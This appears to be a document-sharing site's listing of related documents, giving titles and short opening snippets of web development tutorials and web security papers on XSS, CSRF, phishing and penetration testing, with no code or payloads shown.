Course Information Course Number: IWT 1229 Course Name: Web Development and Design Foundation Course Information Course Number: IWT 1229 Course Name: Web Development and Design Foundation Credit-By-Assessment (CBA) Competency List Written Assessment Competency List Introduction to the Internet

More information

Check list for web developers

Check list for web developers Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation

More information

CTF Web Security Training. Engin Kirda ek@ccs.neu.edu

CTF Web Security Training. Engin Kirda ek@ccs.neu.edu CTF Web Security Training Engin Kirda ek@ccs.neu.edu Web Security Why It is Important Easiest way to compromise hosts, networks and users Widely deployed ( payload No Logs! (POST Request Difficult to defend

More information

Step One Check for Internet Connection

Step One Check for Internet Connection Connecting to Websites Programmatically with Android Brent Ward Hello! My name is Brent Ward, and I am one of the three developers of HU Pal. HU Pal is an application we developed for Android phones which

More information

jquery Tutorial for Beginners: Nothing But the Goods

jquery Tutorial for Beginners: Nothing But the Goods jquery Tutorial for Beginners: Nothing But the Goods Not too long ago I wrote an article for Six Revisions called Getting Started with jquery that covered some important things (concept-wise) that beginning

More information

Instructions for Embedding a Kudos Display within Your Website

Instructions for Embedding a Kudos Display within Your Website Instructions for Embedding a Kudos Display within Your Website You may use either of two technologies for this embedment. A. You may directly insert the underlying PHP code; or B. You may insert some JavaScript

More information

Customising Your Mobile Payment Pages

Customising Your Mobile Payment Pages Corporate Gateway Customising Your Mobile Payment Pages V2.0 May 2014 Use this guide to: Understand how to customise your payment pages for mobile and tablet devices XML Direct Integration Guide > Contents

More information

Yandex.Widgets Quick start

Yandex.Widgets Quick start 17.09.2013 .. Version 2 Document build date: 17.09.2013. This volume is a part of Yandex technical documentation. Yandex helpdesk site: http://help.yandex.ru 2008 2013 Yandex LLC. All rights reserved.

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2 Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

Web Application Security

Web Application Security Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching

More information

Phishing by data URI

Phishing by data URI Phishing by data URI Henning Klevjer henning@klevjers.com October 22, 2012 1 Abstract Historically, phishing web pages have been hosted by web servers that are either compromised or owned by the attacker.

More information

Example. Represent this as XML

Example. Represent this as XML Example INF 221 program class INF 133 quiz Assignment Represent this as XML JSON There is not an absolutely correct answer to how to interpret this tree in the respective languages. There are multiple

More information

25 Million Flows Later - Large-scale Detection of DOM-based XSS

25 Million Flows Later - Large-scale Detection of DOM-based XSS 25 Million Flows Later - Large-scale Detection of DOM-based XSS Sebastian Lekies SAP AG sebastian.lekies@sap.com Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Martin Johns SAP AG martin.johns@sap.com

More information

NewsletterAdmin 2.4 Setup Manual

NewsletterAdmin 2.4 Setup Manual NewsletterAdmin 2.4 Setup Manual Updated: 7/22/2011 Contact: corpinteractiveservices@crain.com Contents Overview... 2 What's New in NewsletterAdmin 2.4... 2 Before You Begin... 2 Testing and Production...

More information

25 Million Flows Later Large- scale Detec6on of DOM- based XSS. Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns

25 Million Flows Later Large- scale Detec6on of DOM- based XSS. Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns 25 Million Flows Later Large- scale Detec6on of DOM- based XSS Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns Me, myself and I Dr. Martin Johns Background in software engineering Academic

More information

Precise client-side protection against DOM-based Cross-Site Scripting

Precise client-side protection against DOM-based Cross-Site Scripting Precise client-side protection against DOM-based Cross-Site Scripting Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Patrick Spiegel SAP AG patrick.spiegel@sap.com Sebastian Lekies SAP AG sebastian.lekies@sap.com

More information

Advanced Web Development SCOPE OF WEB DEVELOPMENT INDUSTRY

Advanced Web Development SCOPE OF WEB DEVELOPMENT INDUSTRY Advanced Web Development Duration: 6 Months SCOPE OF WEB DEVELOPMENT INDUSTRY Web development jobs have taken thе hot seat when it comes to career opportunities and positions as a Web developer, as every

More information

1. Building Testing Environment

1. Building Testing Environment The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,

More information

Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum

Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations Marco Morana & Scott Nusbaum Cincinnati Chapter September 08 Meeting Copyright 2008 The Foundation Permission is granted to copy,

More information

JavaScript Security. John Graham Cumming

JavaScript Security. John Graham Cumming JavaScript Security John Graham Cumming Living in a powder keg and giving off sparks JavaScript security is a mess The security model is outdated Key examples AGacking DNS to agack JavaScript What are

More information

How to Create an HTML Page

How to Create an HTML Page This is a step-by-step guide for creating a sample webpage. Once you have the page set up, you can add and customize your content using the various tags. To work on your webpage, you will need to access

More information

Debugging JavaScript and CSS Using Firebug. Harman Goei CSCI 571 1/27/13

Debugging JavaScript and CSS Using Firebug. Harman Goei CSCI 571 1/27/13 Debugging JavaScript and CSS Using Firebug Harman Goei CSCI 571 1/27/13 Notice for Copying JavaScript Code from these Slides When copying any JavaScript code from these slides, the console might return

More information